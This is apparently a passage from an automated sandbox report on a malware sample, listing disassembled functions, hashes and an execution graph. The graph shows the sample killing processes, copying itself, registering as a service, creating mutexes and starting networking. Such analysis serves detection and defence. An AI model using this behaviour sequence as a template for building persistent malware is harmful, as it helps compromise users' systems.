                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3236713533-0
                                                                                                                                                                                                            • Opcode ID: d321e781cbf9f1441814cfe89cafe2f33cd6c75855371886c32d4e4226e0e6a0
                                                                                                                                                                                                            • Instruction ID: bff7e21ddfb5a0bcb2cda27b018d1b2df0eb32a1f25459d7203244543fa4822d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d321e781cbf9f1441814cfe89cafe2f33cd6c75855371886c32d4e4226e0e6a0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62714376A0120CEFC700DFA6FC85679BBB6FBD5720B11455AE885A22B4E73444A5FF80
                                                                                                                                                                                                            Function 00ECBD08 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECBDDD
                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,000000FF), ref: 00ECBE24
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ECBE68
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00ECBF01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ECBF2F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcess$NextOpenProcess32Terminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3173823348-0
                                                                                                                                                                                                            • Opcode ID: d3a7c70086f03a309b379c39b55f2309f658499a3d8121a7484bb2defa2ac4f8
                                                                                                                                                                                                            • Instruction ID: 99af73ee4da4ba16f617b3a08a6c8b5a77cb8adcd50b4545031f3a7c5163efda
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3a7c70086f03a309b379c39b55f2309f658499a3d8121a7484bb2defa2ac4f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1051217960120DCFC704DF25FD96ABA37FAFB98329B14811AE801E3270DB348995EB40
                                                                                                                                                                                                            Function 00ECD000 Relevance: 6.3, APIs: 4, Instructions: 269fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ECD11A
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 00ECD1CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00ECD3EE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00ECD2E9
                                                                                                                                                                                                              • Part of subcall function 00EEFCC0: ReleaseMutex.KERNEL32(00ECD410,?,00ECD410,00000128), ref: 00EEFCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFileHandle$CreateMutexReadRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1760212717-0
                                                                                                                                                                                                            • Opcode ID: 70116dbed224fa2c84218285dd5944b8090a186eae5dd8703ef609bf5513c601
                                                                                                                                                                                                            • Instruction ID: 5d5b96eca969e512cfbac893aaa83ec483d0c2d91ac217a97fbf732292d0c85d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70116dbed224fa2c84218285dd5944b8090a186eae5dd8703ef609bf5513c601
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFB1767160160CDFC7049F24FD86B6937B6F7D4310F22805AE541A32B0EB7259A5EB82
                                                                                                                                                                                                            Function 00ED68D0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00ED03A9,00000000,?), ref: 00ED6957
                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,00ED03A9,00000000), ref: 00ED695E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00ED03A9,00000000,?), ref: 00ED69C8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00ED03A9,00000000,?), ref: 00ED69CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: 8f69f12962976cb9816dd29f9d6d25bc1f84a19c15201bdaa9e77e5a17442094
                                                                                                                                                                                                            • Instruction ID: 49897cc2d86d8a1a9a304bd6dec94471397f264c275cbd14a16744a66380ba68
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f69f12962976cb9816dd29f9d6d25bc1f84a19c15201bdaa9e77e5a17442094
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1521CDB5A0130CDFD7009F21FE8AA503B79F792320B628005D985A22B4EB319874FF91
                                                                                                                                                                                                            Function 00EE0FD8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/
                                                                                                                                                                                                            • API String ID: 0-571299465
                                                                                                                                                                                                            • Opcode ID: 24494eb224d859068fe71043c8e3c79e28e68fd185f11fc856fff3c0035d3a63
                                                                                                                                                                                                            • Instruction ID: 8aa204b5c9123a443755abc5a65ee24111d81f95b0c09954eccaf95aadda893d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24494eb224d859068fe71043c8e3c79e28e68fd185f11fc856fff3c0035d3a63
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF12331A0024DDFD704EF60FD92ABA37BAFB54320F00816AE946772B1EB715959EB50

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:11.7%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:3.1%
                                                                                                                                                                                                            Total number of Nodes:1717
                                                                                                                                                                                                            Total number of Limit Nodes:22
                                                                                                                                                                                                            execution_graph 11172 9f5f98 11173 9f5706 11172->11173 11174 9f86f1 11173->11174 11176 9dd500 lstrlen 11173->11176 11176->11173 10617 9de211 10618 9de240 ExitProcess 10617->10618 10620 9e6c10 10621 9e6c21 RegisterServiceCtrlHandlerA 10620->10621 10623 9e6fc8 10621->10623 10624 9e6da2 SetServiceStatus CreateEventA 10621->10624 10625 9e6e3b 10624->10625 10626 9e6e58 SetServiceStatus 10624->10626 10625->10626 10627 9e6ea0 WaitForSingleObject 10626->10627 10627->10627 10628 9e6ecb 10627->10628 10629 9f3110 WaitForSingleObject 10628->10629 10630 9e6eff SetServiceStatus CloseHandle SetServiceStatus 10629->10630 10630->10623 11177 9ebf90 11180 9ee140 11177->11180 11181 9ee158 11180->11181 11182 9f0b00 8 API calls 11181->11182 11183 9ebfb3 11182->11183 11184 9f4590 11185 9f45bd 11184->11185 11186 9f0610 2 API calls 11185->11186 11187 9f45c2 11186->11187 11188 9ffde0 3 API calls 11187->11188 11189 9f45ee 11188->11189 10350 a04eb3 10351 a04ec5 10350->10351 10353 9d7a04 136 API calls 10351->10353 10352 a04ec9 10353->10352 11385 9dbd08 11390 9dbd10 11385->11390 11386 9da4e0 lstrlen 11386->11390 11387 9dbdbb OpenProcess 11388 9dbe02 TerminateProcess 11387->11388 11387->11390 11388->11390 11391 9dbe67 CloseHandle 11388->11391 11389 9dbedd Process32Next 11389->11390 11392 9dbf19 CloseHandle 11389->11392 11390->11386 11390->11387 11390->11389 11390->11391 11391->11390 11394 9dbf47 11392->11394 11395 9da307 11396 9da310 Sleep 11395->11396 11396->11396 10354 9d2080 10355 9d2097 10354->10355 10358 9f0790 10355->10358 10359 9f0a0d 10358->10359 10360 9f07cb 10358->10360 10376 9da850 10359->10376 10362 9f0926 10360->10362 10364 9f07e5 10360->10364 10363 9ed9a0 4 API calls 10362->10363 10366 9d21e4 10363->10366 10367 9ed9a0 10364->10367 10369 9ed9c5 10367->10369 10368 9eda26 10368->10366 10369->10368 10370 9edadb 10369->10370 10384 9e2c90 10369->10384 10371 9e2c90 4 API calls 10370->10371 10373 9edb90 10370->10373 10371->10373 10389 9d1170 10373->10389 10377 9da8dc 10376->10377 10378 9e2c90 4 API calls 10377->10378 10380 9daa1a 10377->10380 10378->10380 10379 9f3a80 4 API calls 10382 9daa81 10379->10382 10380->10379 10381 9dacfe 10380->10381 10381->10366 10382->10381 10383 9f3a80 4 API calls 10382->10383 10383->10382 10386 9e2cb9 10384->10386 10385 9e2ce0 10385->10370 10386->10385 10393 9f3a80 10386->10393 10388 9e2d76 10388->10370 10391 9d119e 10389->10391 10390 9d1396 10390->10366 10391->10390 10392 9e2eb0 2 API calls 10391->10392 10392->10391 10394 9f3ab7 10393->10394 10397 9f3ae7 10393->10397 10395 9de2c0 2 API calls 10394->10395 10396 9f3ade 10395->10396 10396->10397 10398 9e2eb0 2 API calls 10396->10398 10397->10388 10398->10397 10399 9d1080 10400 9d108b 10399->10400 10403 9f0b00 10400->10403 10402 9d1117 10404 9f3f00 8 API calls 10403->10404 10405 9f0b1c 10404->10405 10405->10402 11190 9dc980 11191 9dc99d 11190->11191 11192 9de2c0 2 API calls 11191->11192 11193 9dc9f6 11192->11193 11397 9e1500 11400 9eee60 11397->11400 11401 9eb720 lstrlen 11400->11401 11402 9e150f 11401->11402 9457 a04f8a 9458 a04ec5 9457->9458 9461 9d7a04 9458->9461 9462 9e1bb0 2 API calls 9461->9462 9463 9d7a18 9462->9463 9464 9d2f90 2 API calls 9463->9464 9465 9d7a60 9464->9465 9466 9e1bb0 2 API calls 9465->9466 9467 9d7aa7 9466->9467 9468 9d2f90 2 API calls 9467->9468 9469 9d7b0e 9468->9469 9470 9e1bb0 2 API calls 9469->9470 9471 9d7b22 9470->9471 9472 9d2f90 2 API calls 9471->9472 9473 9d7bad 9472->9473 9474 9e1bb0 2 API calls 9473->9474 9475 9d7bc3 9474->9475 9476 9d2f90 2 API calls 9475->9476 9477 9d7c07 9476->9477 9478 9e1bb0 2 API calls 9477->9478 9479 9d7c7a 9478->9479 9480 9d2f90 2 API calls 9479->9480 9481 9d7cb7 9480->9481 9482 9e1bb0 2 API calls 9481->9482 9483 9d7d1b 9482->9483 9484 9d2f90 2 API calls 9483->9484 9485 9d7d90 9484->9485 9486 9e1bb0 2 API calls 9485->9486 9487 9d7da6 9486->9487 9488 9d2f90 2 API calls 9487->9488 9489 9d7dfc 9488->9489 9490 9e1bb0 2 API calls 9489->9490 9491 9d7e1a 9490->9491 9492 9d2f90 2 API calls 9491->9492 9493 9d7e73 9492->9493 9494 9e1bb0 2 API calls 9493->9494 9495 9d7e87 9494->9495 9496 9d2f90 2 API calls 9495->9496 9497 9d7ef1 9496->9497 9498 9e1bb0 2 API calls 9497->9498 9499 9d7f05 9498->9499 9500 9d2f90 2 API calls 9499->9500 9501 9d7f42 9500->9501 9502 9e1bb0 2 API calls 9501->9502 9503 9d7f62 9502->9503 9504 9d2f90 2 API calls 9503->9504 9505 9d7fe8 9504->9505 9506 9e1bb0 2 API calls 9505->9506 9507 9d8004 9506->9507 9508 9d2f90 2 API calls 9507->9508 9509 9d8093 9508->9509 9510 9e1bb0 2 API calls 9509->9510 9511 9d80a7 9510->9511 9512 9d2f90 2 API calls 9511->9512 9513 9d8106 9512->9513 9514 9e1bb0 2 API calls 9513->9514 9515 9d818f 9514->9515 9516 9d2f90 2 API calls 9515->9516 9517 9d81d1 9516->9517 9518 9e1bb0 2 API calls 9517->9518 9519 9d81eb 9518->9519 9520 9d2f90 2 API calls 9519->9520 9521 9d8230 9520->9521 9522 9e1bb0 2 API calls 9521->9522 9523 9d8268 9522->9523 9524 9e1bb0 2 API calls 9523->9524 9525 9d82b6 9524->9525 9526 9e2eb0 2 API calls 9525->9526 9527 9d8388 9526->9527 9702 a050e0 9527->9702 9529 9d839b 9530 9d2f90 2 API calls 9529->9530 9531 9d83c0 GetEnvironmentVariableA 9530->9531 9532 9e1bb0 2 API calls 9531->9532 9533 9d83f9 CreateMutexA 9532->9533 9535 9d8480 CreateMutexA CreateMutexA 9533->9535 9537 9d8521 9535->9537 9538 9d868b 9537->9538 9539 9d8587 GetTickCount 9537->9539 9709 9e5200 9538->9709 9541 9d85a5 9539->9541 9543 9d2f90 2 API calls 9541->9543 9542 9d86a4 GetCommandLineA 9544 9d86cb 9542->9544 9546 9d85bd 9543->9546 9545 9d2f90 2 API calls 9544->9545 9547 9d874d 9545->9547 9548 9e1bb0 2 API calls 9546->9548 9550 9e1bb0 2 API calls 9547->9550 9549 9d8622 9548->9549 9549->9538 9551 9d878c 9550->9551 9552 9d9235 GetCommandLineA 9551->9552 9554 9d2f90 2 API calls 9551->9554 9811 9fb990 9552->9811 9556 9d87dd 9554->9556 9557 9e1bb0 2 API calls 9556->9557 9559 9d8812 9557->9559 9558 9d9271 9814 9dd500 lstrlen 9558->9814 9560 9d8842 9559->9560 9563 9d2800 ExitProcess 9559->9563 9565 9d2f90 2 API calls 9560->9565 9562 9d9323 GetModuleFileNameA 9815 9da4e0 lstrlen 9562->9815 9563->9560 9566 9d88ab 9565->9566 9568 9e1bb0 2 API calls 9566->9568 9567 9d93ae 9570 9da4e0 lstrlen 9567->9570 9569 9d88db 9568->9569 9571 9d8926 9569->9571 9573 9d2800 ExitProcess 9569->9573 9572 9d945a 9570->9572 9959 9de430 9571->9959 9574 9da4e0 lstrlen 9572->9574 9573->9571 9586 9d947b 9574->9586 9576 9d8961 9577 9d2f90 2 API calls 9576->9577 9578 9d8978 9577->9578 9582 9e1bb0 2 API calls 9578->9582 9579 9d9744 9817 9f3cf0 9579->9817 9581 9d97b2 9583 9d97d4 9581->9583 9584 9d2800 ExitProcess 9581->9584 9588 9d89cb 9582->9588 9826 9f9b00 9583->9826 9584->9583 9586->9579 9591 9d954b 9586->9591 9587 9d981d 9920 a008b0 GetSystemTimeAsFileTime 9587->9920 9596 9d8ab7 9588->9596 9590 9d9830 9922 9f48d0 9590->9922 9998 9e8a70 9591->9998 9594 9d956f 10004 9f9580 9594->10004 9600 a008b0 GetSystemTimeAsFileTime 9596->9600 9603 9d8b61 Sleep 9596->9603 9608 9d8c99 Sleep 9596->9608 9609 9e1530 CreateFileA GetFileTime CloseHandle GetFileSize CloseHandle 9596->9609 9628 9d8cd8 9596->9628 9964 9e2120 9596->9964 9598 9d98a8 9610 9d9952 WSAStartup 9598->9610 9599 9d971a 9601 9d2800 ExitProcess 9599->9601 9600->9596 9601->9579 9602 9d2f90 2 API calls 9605 9d9651 9602->9605 9603->9596 9604 9d958b 9604->9599 9604->9602 10017 9dd500 lstrlen 9605->10017 9607 9d9666 MessageBoxA 9614 9e1bb0 2 API calls 9607->9614 9608->9596 9609->9596 9612 9d99b6 9610->9612 9617 9d2f90 2 API calls 9612->9617 9623 9d99ff 9612->9623 9613 9e2120 5 API calls 9613->9628 9616 9d96ef 9614->9616 9615 9d8de6 9988 9e1530 9615->9988 9619 9d2800 ExitProcess 9616->9619 9620 9d99e4 9617->9620 9619->9599 10018 9dc540 9620->10018 9622 9d9a7b 9634 9d9d65 9622->9634 9635 9d9aa3 CloseHandle SetFileAttributesA CopyFileA 9622->9635 9623->9622 9926 9eee80 9623->9926 9624 9d8e04 9632 9d8e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9624->9632 9633 9d91a4 9624->9633 9626 9d8d8c Sleep 9626->9628 9628->9613 9628->9615 9975 9dbbc0 9628->9975 9629 9d9a32 9630 9d9a36 9629->9630 9631 9d9a53 9629->9631 9636 9d2800 ExitProcess 9630->9636 10023 9d26e0 9631->10023 9638 9d2f90 2 API calls 9632->9638 9645 9ffa80 3 API calls 9633->9645 9650 9d9d76 9634->9650 9639 9d9b1a SetFileAttributesA 9635->9639 9640 9d9c78 9635->9640 9636->9631 9651 9d8eff 9638->9651 9641 9d9b73 9639->9641 9642 9d9b5d 9639->9642 9647 9f3110 WaitForSingleObject 9640->9647 9648 9d9c2a Sleep 9641->9648 10031 9e7a50 9641->10031 9937 9e0500 OpenSCManagerA 9642->9937 9646 9d9210 9645->9646 9652 9d2800 ExitProcess 9646->9652 9653 9d9d15 9647->9653 9951 9ffa80 9648->9951 9649 9e2120 5 API calls 9649->9650 9650->9649 9656 9d9e57 SetFileAttributesA CopyFileA SetFileAttributesA 9650->9656 9659 9dbbc0 8 API calls 9650->9659 9657 9e1bb0 2 API calls 9651->9657 9652->9552 9956 9d2800 9653->9956 9664 9de430 lstrlen 9656->9664 9661 9d8f61 9657->9661 9663 9d9e1a Sleep 9659->9663 9666 9d2f90 2 API calls 9661->9666 9676 9d904a 9661->9676 9663->9650 9663->9656 9665 9d9ee1 9664->9665 9669 9d2f90 2 API calls 9665->9669 9671 9d8fbf 9666->9671 9667 9d913d SetFileAttributesA 9667->9633 9668 9d9113 SetFileAttributesA 9668->9633 9672 9d9efd 9669->9672 9674 9e1bb0 2 API calls 9671->9674 9673 9d2f90 2 API calls 9672->9673 9675 9d9fbe 9673->9675 9674->9676 9677 9e1bb0 2 API calls 9675->9677 9676->9667 9676->9668 9678 9da039 9677->9678 10041 9e0dc0 9678->10041 9680 9da050 9681 9e1bb0 2 API calls 9680->9681 9682 9da06b 9681->9682 10045 9e1200 9682->10045 9685 9d2f90 2 API calls 9686 9da0ae 9685->9686 9687 9d2f90 2 API calls 9686->9687 9688 9da0c6 9687->9688 10066 a05820 9688->10066 9690 9da0f2 9691 9e1bb0 2 API calls 9690->9691 9692 9da115 9691->9692 9693 9e1bb0 2 API calls 9692->9693 9694 9da127 9693->9694 9695 9ffa80 3 API calls 9694->9695 9696 9da185 9695->9696 9697 9da24e CreateThread 9696->9697 9698 9da2cd 9697->9698 9699 9da2a2 9697->9699 9701 9da310 Sleep 9698->9701 10069 9dc660 StartServiceCtrlDispatcherA 9699->10069 9701->9701 9703 a05172 9702->9703 9704 a05186 GetSystemTime 9702->9704 9703->9704 9705 a051be 9704->9705 9706 a008b0 GetSystemTimeAsFileTime 9705->9706 9707 a052a7 GetTickCount 9706->9707 9708 a052d4 9707->9708 9708->9529 9710 9e521d 9709->9710 9711 9e52b2 GetVersionExA 9710->9711 10070 9db7a0 AllocateAndInitializeSid 9711->10070 9717 9d2f90 2 API calls 9718 9e5652 9717->9718 10090 9dd530 9718->10090 9721 9e1bb0 2 API calls 9726 9e5692 9721->9726 9722 9e5496 CreateDirectoryA 9724 9d2f90 2 API calls 9722->9724 9723 9e5357 9723->9722 9725 9e54bb 9724->9725 9727 9e1bb0 2 API calls 9725->9727 10094 9e1d90 9726->10094 9731 9e550a 9727->9731 9729 9e56cb 9730 9e56d6 DeleteFileA RemoveDirectoryA 9729->9730 9732 9e575d 9729->9732 9730->9732 9731->9717 9733 9df0d0 6 API calls 9732->9733 9734 9e5776 9733->9734 9735 9e581e CreateDirectoryA 9734->9735 9736 9e585b 9735->9736 9737 9de430 lstrlen 9736->9737 9738 9e58cb CreateDirectoryA 9737->9738 9739 9e5917 9738->9739 9740 9d2f90 2 API calls 9739->9740 9741 9e592d 9740->9741 9742 9d2f90 2 API calls 9741->9742 9743 9e59e9 9742->9743 9744 9e1bb0 2 API calls 9743->9744 9745 9e5a07 9744->9745 9746 9dd530 9 API calls 9745->9746 9747 9e5a77 9746->9747 9748 9e1bb0 2 API calls 9747->9748 9749 9e5aaa 9748->9749 9750 9e1d90 5 API calls 9749->9750 9751 9e5ad7 9750->9751 9752 9e64f5 9751->9752 9753 9e5b07 9751->9753 9754 9e5c42 9751->9754 9759 9de430 lstrlen 9752->9759 9756 9d2f90 2 API calls 9753->9756 9755 9d2f90 2 API calls 9754->9755 9757 9e5c61 9755->9757 9758 9e5b2d 9756->9758 9761 a05820 wvsprintfA 9757->9761 9762 a05820 wvsprintfA 9758->9762 9760 9e6549 SetFileAttributesA 9759->9760 9766 9e657e 9760->9766 9763 9e5c87 9761->9763 9764 9e5b5a 9762->9764 9765 9e1bb0 2 API calls 9763->9765 9767 9e1bb0 2 API calls 9764->9767 9769 9e5b9f 9765->9769 9766->9542 9767->9769 9768 9e5bea 9770 9e5d53 CreateDirectoryA 9768->9770 9769->9768 9771 9e5d9a 9770->9771 9772 9de430 lstrlen 9771->9772 9773 9e5e4f CreateDirectoryA 9772->9773 9774 9d2f90 2 API calls 9773->9774 9775 9e5e9e 9774->9775 9776 9d2f90 2 API calls 9775->9776 9777 9e5f4c 9776->9777 9778 9e1bb0 2 API calls 9777->9778 9779 9e5f68 9778->9779 9780 9dd530 9 API calls 9779->9780 9781 9e5f86 9780->9781 9782 9e1bb0 2 API calls 9781->9782 9783 9e5fcf 9782->9783 9784 9e1d90 5 API calls 9783->9784 9785 9e6002 9784->9785 9786 9e600d GetTempPathA 9785->9786 9787 9e6485 9785->9787 10110 9dd500 lstrlen 9786->10110 9787->9752 9789 9e604f 9790 9de430 lstrlen 9789->9790 9791 9e61cb CreateDirectoryA 9790->9791 9793 9e6219 9791->9793 9794 9d2f90 2 API calls 9793->9794 9795 9e6237 9794->9795 9796 9d2f90 2 API calls 9795->9796 9797 9e62be 9796->9797 9798 9e1bb0 2 API calls 9797->9798 9799 9e6302 9798->9799 9800 9dd530 9 API calls 9799->9800 9801 9e6360 9800->9801 9802 9e1bb0 2 API calls 9801->9802 9803 9e6372 9802->9803 9804 9e1d90 5 API calls 9803->9804 9805 9e63b5 9804->9805 9805->9787 9806 9e63c0 GetTempPathA 9805->9806 9807 9e63ff 9806->9807 9808 9d2f90 2 API calls 9807->9808 9809 9e642d 9808->9809 9810 9e1bb0 2 API calls 9809->9810 9810->9787 10145 9dd500 lstrlen 9811->10145 9813 9fb9c3 9813->9558 9814->9562 9816 9da53c 9815->9816 9816->9567 9818 9f3d35 9817->9818 9819 9de430 lstrlen 9818->9819 9820 9f3d66 9819->9820 9821 9d2f90 2 API calls 9820->9821 9822 9f3d82 9821->9822 9823 9e1bb0 2 API calls 9822->9823 9824 9f3dd1 CreateFileA 9823->9824 9825 9f3e32 9824->9825 9825->9581 9827 9f9b93 9826->9827 9828 9f9c40 GetComputerNameA 9827->9828 9829 9f9c53 9828->9829 9830 9f9cbb 9828->9830 9831 9d2f90 2 API calls 9829->9831 9832 9d2f90 2 API calls 9830->9832 9833 9f9c7e 9831->9833 9834 9f9d55 9832->9834 9835 9e1bb0 2 API calls 9833->9835 9836 9e1bb0 2 API calls 9834->9836 9835->9830 9837 9f9db1 9836->9837 9838 9dd530 9 API calls 9837->9838 9839 9f9dd5 9838->9839 10146 9e2c30 9839->10146 9841 9f9e08 10149 9ea930 9841->10149 9843 9f9f23 10191 9dd500 lstrlen 9843->10191 9845 9f9f65 10192 a001a0 9845->10192 9849 9f9fcf 9850 9e2c30 8 API calls 9849->9850 9851 9f9ffe 9850->9851 9852 a001a0 9 API calls 9851->9852 9853 9fa0a3 9852->9853 9854 a01050 8 API calls 9853->9854 9855 9fa0b2 9854->9855 9856 9e2c30 8 API calls 9855->9856 9857 9fa0dd 9856->9857 9858 a001a0 9 API calls 9857->9858 9859 9fa118 9858->9859 9860 a01050 8 API calls 9859->9860 9861 9fa127 9860->9861 9862 9e2c30 8 API calls 9861->9862 9863 9fa16c 9862->9863 9864 a001a0 9 API calls 9863->9864 9865 9fa18b 9864->9865 9866 a01050 8 API calls 9865->9866 9867 9fa197 9866->9867 9868 9e2c30 8 API calls 9867->9868 9869 9fa1e1 9868->9869 9870 a001a0 9 API calls 9869->9870 9871 9fa204 9870->9871 9872 a01050 8 API calls 9871->9872 9873 9fa213 9872->9873 9874 9e2c30 8 API calls 9873->9874 9875 9fa248 9874->9875 9876 9d2f90 2 API calls 9875->9876 9877 9fa280 9876->9877 9878 a001a0 9 API calls 9877->9878 9879 9fa2bf 9878->9879 9880 a01050 8 API calls 9879->9880 9881 9fa2ce 9880->9881 9882 9e1bb0 2 API calls 9881->9882 9883 9fa2f5 9882->9883 9884 9e2c30 8 API calls 9883->9884 9885 9fa31b 9884->9885 9886 a001a0 9 API calls 9885->9886 9887 9fa347 9886->9887 9888 a01050 8 API calls 9887->9888 9889 9fa353 9888->9889 9890 9e2c30 8 API calls 9889->9890 9891 9fa391 9890->9891 9892 a001a0 9 API calls 9891->9892 9893 9fa3aa 9892->9893 9894 a01050 8 API calls 9893->9894 9895 9fa3b9 9894->9895 9896 9e2c30 8 API calls 9895->9896 9897 9fa402 9896->9897 10199 9e2f60 9897->10199 9901 9fa465 9902 a001a0 9 API calls 9901->9902 9903 9fa471 